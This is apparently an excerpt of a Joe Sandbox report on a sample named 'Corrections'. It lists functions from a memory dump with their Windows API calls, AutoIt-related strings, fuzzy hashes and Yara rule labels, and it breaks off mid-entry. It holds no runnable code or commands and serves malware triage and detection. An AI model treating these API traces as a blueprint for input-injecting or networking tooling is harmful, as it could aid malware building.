Instruction ID: ca5e995a2b9468475d4817c975b5be8dd4a3bac889054d5a0c5678efa0dbd7b9
Opcode Fuzzy Hash: e38dced48efb03ddfba5edcbf1da906dc812767950a66f720cfd4a602a3e7b06
Instruction Fuzzy Hash: 33416FA6C11214B5DB11EBB88C8AFCFB7ACAF45310F518462E518E3221FA34E255C7E6

Function 0093FBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,009639E2,00000004,00000000,00000000), ref: 0093FC41
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,009639E2,00000004,00000000,00000000), ref: 0097FC15
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,009639E2,00000004,00000000,00000000), ref: 0097FC98

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 45c982ed649605ae0c613231ca62445b4ddb84b03b5085029b3b08cc1ee5acc8
Instruction ID: af0ce3187953ab28b4236f5bd15360f9f34ec866870aadab87d16552669737bf
Opcode Fuzzy Hash: 45c982ed649605ae0c613231ca62445b4ddb84b03b5085029b3b08cc1ee5acc8
Instruction Fuzzy Hash: 25415B31A4C3889EC7358B39CAB87797B95AB46310F18993CE9CE56960C635A840DF10

Function 009B379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 009B37B7
GetDC.USER32(00000000), ref: 009B37BF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 009B37CA
ReleaseDC.USER32(00000000,00000000), ref: 009B37D6
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009B3812
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009B3823
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,009B6504,?,?,000000FF,00000000,?,000000FF,?), ref: 009B385E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009B387D

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: d2c80c4d163e9a5d71d2bd29b96f75cff44660fd799125107c0904b7bbe0a583
Instruction ID: b1d300ab3e064fe1ac3ee183404767d375b95850414c3c5d4814f0b19f7963b6
Opcode Fuzzy Hash: d2c80c4d163e9a5d71d2bd29b96f75cff44660fd799125107c0904b7bbe0a583
Instruction Fuzzy Hash: 0631FF72215214BFEB148F50CD89FEB3FADEF09720F044165FE089A290D6B48C40CBA0

Function 009A5A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 009A5A64
NULL Pointer assignment, xrefs: 009A5A8B, 009A5DE0

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 0cc33e9f6d6fbe0bd02dd2d2920115a0e1d2147394e6fc423491db85c6e64c9d
Instruction ID: a0f43ca2463209d1b55be2863c0eaac0b2445f6d6100090fc97bf63beaf1a950
Opcode Fuzzy Hash: 0cc33e9f6d6fbe0bd02dd2d2920115a0e1d2147394e6fc423491db85c6e64c9d
Instruction Fuzzy Hash: E3D1D371B0060A9FDF10CF58C885BAEB7B9FF89314F168569E905AB290D770DD41CBA0

Function 009618A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00961B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0096194E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00961B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 009619D1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00961B7B,?,00961B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00961A64
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00961B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00961A7B

Part of subcall function 00953B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A79,?,0000015D,?,?,?,?,009485B0,000000FF,00000000,?,?), ref: 00953BC5

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00961B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00961AF7
__freea.LIBCMT ref: 00961B22
__freea.LIBCMT ref: 00961B2E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 4050a719aa9d2c9172d965d43f3f8e386318205c8875dabff40f09e28e0aee49
Instruction ID: a6ace6bfa42c6d0f33409357a6ce79d589c392c7db2b19e850154cbedf9ca919
Opcode Fuzzy Hash: 4050a719aa9d2c9172d965d43f3f8e386318205c8875dabff40f09e28e0aee49
Instruction Fuzzy Hash: 5191D272E002169ADF248FB4D891EEEBBB9AF49350F1C0629E805E7280E735DD44DB60

Function 009A4F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009A50A5
VariantInit.OLEAUT32(?), ref: 009A51A6
VariantClear.OLEAUT32(?), ref: 009A51B0
VariantClear.OLEAUT32(?), ref: 009A520D

Strings

Null Object assignment in FOR..IN loop, xrefs: 009A5035, 009A5163, 009A521B
Incorrect Object type in FOR..IN loop, xrefs: 009A5189

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 0a94394f933c1167c9fe1e33c4a2cf9327a61d4eb41a343e511b6b27a743ffdb
Instruction ID: 5a79979f8e9f4213fdc640d9952e9909ef712edacb6e2ab939d5f095d66dd684
Opcode Fuzzy Hash: 0a94394f933c1167c9fe1e33c4a2cf9327a61d4eb41a343e511b6b27a743ffdb
Instruction Fuzzy Hash: D7919D71A04619ABDF20CFA5C884FAFBBB8AF86314F118559F519AB280D7709945CFE0

Function 00991B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00991C1B
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00991C43
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00991C67
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00991C97
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00991D1E
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00991D83
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00991DEF

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: a90730ef14f6df8ec104d7dd7f03fca7bf0caa4c0a1bb9ea5a3835f2637b8b6b
Instruction ID: 176b258adf3d55c1392f350dd311a2b8b5f1f942d6a2f92027a4e6968bf20d54
Opcode Fuzzy Hash: a90730ef14f6df8ec104d7dd7f03fca7bf0caa4c0a1bb9ea5a3835f2637b8b6b
Instruction Fuzzy Hash: 3F91F375A0021A9FDF01DF98C884BBEB7B9FF49725F104029E951EB2A1E774A940CB50

Function 009A43A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009A43C8
CharUpperBuffW.USER32(?,?), ref: 009A44D7
_wcslen.LIBCMT ref: 009A44E7
VariantClear.OLEAUT32(?), ref: 009A467C

Part of subcall function 0099169E: VariantInit.OLEAUT32(00000000), ref: 009916DE
Part of subcall function 0099169E: VariantCopy.OLEAUT32(?,?), ref: 009916E7
Part of subcall function 0099169E: VariantClear.OLEAUT32(?), ref: 009916F3

Strings

Incorrect Parameter format, xrefs: 009A4403, 009A45FE
AUTOIT.ERROR, xrefs: 009A44DD, 009A44E2

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 10a867f53b55a8b563fa3892aeea1694045b184dc7f2583b25a195ae201129cf
Instruction ID: af7c7ec44116336877a011cb9d0b467d84abe19b08758a0f00e0d653f7b15977
Opcode Fuzzy Hash: 10a867f53b55a8b563fa3892aeea1694045b184dc7f2583b25a195ae201129cf
Instruction Fuzzy Hash: D7912675A083019FC714EF24C480A6AB7E9BFCA714F14892DF89A9B351DB71ED05CB92

Function 009A560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 009808FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00980831,80070057,?,?,?,00980C4E), ref: 0098091B
Part of subcall function 009808FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00980831,80070057,?,?), ref: 00980936
Part of subcall function 009808FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00980831,80070057,?,?), ref: 00980944
Part of subcall function 009808FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00980831,80070057,?), ref: 00980954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 009A56AE
_wcslen.LIBCMT ref: 009A57B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 009A582C
CoTaskMemFree.OLE32(?), ref: 009A5837

Strings

NULL Pointer assignment, xrefs: 009A5880, 009A58AF

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 370e8caa2eaa8291acf57ad26d62fa58a321d6130a5f12f202704bab9a64511a
Instruction ID: b8b867a751ca5e2da5d907951882757cd422eebfe52c6547b2eeff3eea6ed550
Opcode Fuzzy Hash: 370e8caa2eaa8291acf57ad26d62fa58a321d6130a5f12f202704bab9a64511a
Instruction Fuzzy Hash: 8D911871D00629EFDF10EFA4D880EEEB7B8BF48314F114569E915A7251EB349A44CFA0

Function 009B2B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 009B2C1F
GetMenuItemCount.USER32(00000000), ref: 009B2C51
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009B2C79
_wcslen.LIBCMT ref: 009B2CAF
GetMenuItemID.USER32(?,?), ref: 009B2CE9
GetSubMenu.USER32(?,?), ref: 009B2CF7

Part of subcall function 00984393: GetWindowThreadProcessId.USER32(?,00000000), ref: 009843AD
Part of subcall function 00984393: GetCurrentThreadId.KERNEL32 ref: 009843B4
Part of subcall function 00984393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00982F00), ref: 009843BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009B2D7F

Part of subcall function 0098F292: Sleep.KERNEL32 ref: 0098F30A

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 75c93c5faf7e501cfe7662381c8631546cc053cb4d83867043b90c1351666a58
Instruction ID: 97e1ec84b083ff82cfc78d5dd9d3f4b8aedb4992022a8ff3cb3c216d12af3312
Opcode Fuzzy Hash: 75c93c5faf7e501cfe7662381c8631546cc053cb4d83867043b90c1351666a58
Instruction Fuzzy Hash: 16717175A00215AFCB11EF64C985BEEBBF5EF88320F148459E856EB351DB34AD41CB90

Function 009B88F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 009B8992
IsWindowEnabled.USER32(00000000), ref: 009B899E
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 009B8A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 009B8AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 009B8AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 009B8B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 009B8B1E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 370933007bf4bf234b0e277910171bcb6c09e7e6e65d843a83f9848a34d0b6f4
Instruction ID: 139fc1fe30df8ac68c9405f024ef148bf6090db3c36b7c2693fee88793f8a66d
Opcode Fuzzy Hash: 370933007bf4bf234b0e277910171bcb6c09e7e6e65d843a83f9848a34d0b6f4
Instruction Fuzzy Hash: C4718974604204EFEF219F64CA85FFBBBADEF4D320F14045AE845A7261DB31A980DB11

Function 0098B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0098B8C0
GetKeyboardState.USER32(?), ref: 0098B8D5
SetKeyboardState.USER32(?), ref: 0098B936
PostMessageW.USER32(?,00000101,00000010,?), ref: 0098B964
PostMessageW.USER32(?,00000101,00000011,?), ref: 0098B983
PostMessageW.USER32(?,00000101,00000012,?), ref: 0098B9C4
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0098B9E7

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f821e45eaa678095991c43db338544394fbe9a6404397f048c2af59d4fbee7d7
Instruction ID: c3ff930c732d8c2ee5da410d5066f859fb60125d921a96715f7bab35e9ea918f
Opcode Fuzzy Hash: f821e45eaa678095991c43db338544394fbe9a6404397f048c2af59d4fbee7d7
Instruction Fuzzy Hash: 1951FFA06087D53EFB3662348C55BBABEAD5B06308F0C8489E1D9469D2D3E9ECC4D750

Function 0098B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0098B6E0
GetKeyboardState.USER32(?), ref: 0098B6F5
SetKeyboardState.USER32(?), ref: 0098B756
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0098B782
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0098B79F
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0098B7DE
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0098B7FF

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 269e3b2404e059482c80444cec4e1b417f59f54dece17e3f0228e28e1d6853c7
Instruction ID: 87b00c53895b1f422064eb88fbfb8302cbb47ee8f3ceae310086b31cab7dedaf
Opcode Fuzzy Hash: 269e3b2404e059482c80444cec4e1b417f59f54dece17e3f0228e28e1d6853c7
Instruction Fuzzy Hash: 035127A09487D53EFB32A334CC55B7ABEAC6F45304F0C8589E1D54AAD2D394EC84E750

Function 009557A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00955F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 009557E3
__fassign.LIBCMT ref: 0095585E
__fassign.LIBCMT ref: 00955879
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0095589F
WriteFile.KERNEL32(?,FF8BC35D,00000000,00955F16,00000000,?,?,?,?,?,?,?,?,?,00955F16,?), ref: 009558BE
WriteFile.KERNEL32(?,?,00000001,00955F16,00000000,?,?,?,?,?,?,?,?,?,00955F16,?), ref: 009558F7

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 11e95c5d71fd9441039755f1d26e4e8a2add7f085fa44f47381213eb6408519e
Instruction ID: 65ff29227f7348d9b9f82a403725cdb3feacab57f4ccd11f039a317bce7e332b
Opcode Fuzzy Hash: 11e95c5d71fd9441039755f1d26e4e8a2add7f085fa44f47381213eb6408519e
Instruction Fuzzy Hash: 2551BE70A14649DFCB10CFA9D8A1AEEBBB8FF08321F15411AE951E7292E7309945CB60

Function 00943090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 009430BB
___except_validate_context_record.LIBVCRUNTIME ref: 009430C3
_ValidateLocalCookies.LIBCMT ref: 00943151
__IsNonwritableInCurrentImage.LIBCMT ref: 0094317C
_ValidateLocalCookies.LIBCMT ref: 009431D1

Strings

csm, xrefs: 00943166

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 8d5fa20216cf47090e8cea2b56fd9b322f5d9259815760a4804b3b79cc00018d
Instruction ID: 5d00025cbf00f4a44c5e6337c4e470eac40645517cc0fae68b0301ef09e9c951
Opcode Fuzzy Hash: 8d5fa20216cf47090e8cea2b56fd9b322f5d9259815760a4804b3b79cc00018d
Instruction Fuzzy Hash: 3F418034E04218ABCF10DF78C885EAEBBB9AF89325F14C155E915AB392D731DB05CB91

Function 009A1B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009A3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 009A3AD7
Part of subcall function 009A3AAB: _wcslen.LIBCMT ref: 009A3AF8

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009A1B6F
WSAGetLastError.WSOCK32 ref: 009A1B7E
WSAGetLastError.WSOCK32 ref: 009A1C26
closesocket.WSOCK32(00000000), ref: 009A1C56

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 7d861aba7c9ef6adf5cae5ea3cd73fd12380ee4a16fc2fef4d76878df5f6b645
Instruction ID: 07571d7b686a966446e46372b185118a00fc682e57f05d96dfa8ef1658decd41
Opcode Fuzzy Hash: 7d861aba7c9ef6adf5cae5ea3cd73fd12380ee4a16fc2fef4d76878df5f6b645
Instruction Fuzzy Hash: AC411571600114AFDB109F64C984BAABBEDEF86324F148159F8499B296DB74ED81CBE0

Function 0098D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0098E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0098D7CD,?), ref: 0098E714

